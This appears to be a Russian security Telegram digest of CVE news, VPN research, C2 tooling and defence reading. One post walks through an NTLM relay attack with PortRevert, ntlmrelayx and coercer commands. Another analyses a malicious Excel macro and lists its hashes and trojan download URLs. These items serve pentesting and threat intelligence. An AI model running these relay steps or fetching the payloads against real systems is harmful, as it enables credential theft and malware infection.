www.opennet.ru
Уязвимости в tar-fs и 7-Zip, позволяющие записать файлы за пределы базового каталога
В NPM-пакете tar-fs выявлена уязвимость (CVE-2025-48387), позволяющая при распаковке специально оформленного tar-архива записать файлы в любые части ФС, не ограниченные каталогом, в который осуществляется распаковка (насколько позволяют права доступа текущего…
🔗Ссылка:
https://opennet.ru/63740/
https://opennet.ru/63740/
Forwarded from Похек
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
➡️ Возможности
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
➡️ Использование
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
2. Запустите ntlmrelayx на порту 4445:
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
➡️ Как это работает
💻 Github repo
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
PortRevert.exe
2. Запустите ntlmrelayx на порту 4445:
ntlmrelayx.exe -smb-port 4445 -smb2support -debug
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue
(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)
Жертва -> Порт 445
↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
↓ (ответы)
ntlmrelayx -> Порт 4445
↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecAtor
Ресерчеры Citizen Lab выкатили результаты своих исследований безопасности ряда популярных VPN-приложений, доступных в магазине Google Play.
Оказалось, что многие из VPN-приложений реализуются с одним и тем же паролем Shadowsocks, жёстко зашитым в исходный код, который позволяет владельцам таких приложений расшифровывать пользовательский трафик.
Причем, по данным CitizenLab, эти приложения зарегистрированы на три подставные компании, управление которыми осуществляется с территории Китая.
Другие весьма интригующие детали представлены в отчете (PDF) и, вероятно, приоткроют для многих завесу в вопросах «безопасности и конфиденциальности» при использовании подобных сервисов.
Оказалось, что многие из VPN-приложений реализуются с одним и тем же паролем Shadowsocks, жёстко зашитым в исходный код, который позволяет владельцам таких приложений расшифровывать пользовательский трафик.
Причем, по данным CitizenLab, эти приложения зарегистрированы на три подставные компании, управление которыми осуществляется с территории Китая.
Другие весьма интригующие детали представлены в отчете (PDF) и, вероятно, приоткроют для многих завесу в вопросах «безопасности и конфиденциальности» при использовании подобных сервисов.
Forwarded from Adaptix Framework
В начале месяца мне на глаза попался репозиторий PIC агента Kharon. Несмотря на то, что он находится в активной разработке, я решил выделить денек-второй, чтобы встроить его в AdaptixC2. Как итог, за 11 часов удалось разобраться в работе самой нагрузки, а также написать экстендеры листенера и агента.
Агент отлично работает, поддерживает браузеры файловой системы и процессов, при этом код агента не был никак модифицирован или изменен, работает сразу с оригинального репозитория на гитхаб.
Агент отлично работает, поддерживает браузеры файловой системы и процессов, при этом код агента не был никак модифицирован или изменен, работает сразу с оригинального репозитория на гитхаб.
👍1
Forwarded from 1N73LL1G3NC3
Collect infrastructure and permissions data from vCenter and export it as a BloodHound‑compatible graph using Custom Nodes/Edges
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Кибер ПТУ | Кибербезопасность
arhitektura_zasczisczennyh_setei_blok_28_11_cleaned (2).pdf
9 MB
Сегодня у нас чтиво о защите периметра сети - Архитектура защищённости сетей.
В данной книге разбираются такие типы СЗИ как NGFW, Email Security, WAF и Sandbox. Список самих обозреваемых решений довольно большой, начиная от циски и майкрософта, заканчивая нашими решениями от PT, Usergate и т.д.
Прочитав эту книгу вы сможете понять, цель каждого из описанных СЗИ и в какую часть сети их нужно внедрять.
#AppSec #DevSecOps #SecArch
🧠 Пакет Знаний | 👨🏫 Менторство
📂 Другие каналы
В данной книге разбираются такие типы СЗИ как NGFW, Email Security, WAF и Sandbox. Список самих обозреваемых решений довольно большой, начиная от циски и майкрософта, заканчивая нашими решениями от PT, Usergate и т.д.
Прочитав эту книгу вы сможете понять, цель каждого из описанных СЗИ и в какую часть сети их нужно внедрять.
#AppSec #DevSecOps #SecArch
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
В репозитории PyPI реализована блокировка email с освобождёнными доменами
Разработчики репозитория Python-пакетов PyPI (Python Package Index) реализовали защиту от захвата проектов путём покупки освобождённых доменов, указанных в параметрах учётных записей. Атака сводится к тому, что атакующие выискивают учётные записи, привязанные…
🔗Ссылка:
https://opennet.ru/63753/
https://opennet.ru/63753/
Forwarded from SecuriXy.kz
Нашли и разобрали файл недавно задетекченный коллегой и товарищем https://t.me/qcakz/1639 файл на госзакупках.
В exif все чисто, Хешики:
Чистой воды макрос оказался.
Назначение: Скачивание и исполнение троянца
C2 (Command & Control) / источники загрузки:
Обе линки загрузчика мертвые, но тем не менее, будьте бдительны и не открывайте подозрительные или не известные файлы.
В exif все чисто, Хешики:
MD5 (Invoice.xlsm) = 7c7810a88a362df9453eb2adf63c8f73
SHA256 (Invoice.xlsm) = dc948b5fe49705e0f8e790b378477bed6f458c682562d7ded67cbd0abb9ad433
Чистой воды макрос оказался.
Назначение: Скачивание и исполнение троянца
Synaptics.exe, сохраненного как ~$cache1.exeC2 (Command & Control) / источники загрузки:
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Обе линки загрузчика мертвые, но тем не менее, будьте бдительны и не открывайте подозрительные или не известные файлы.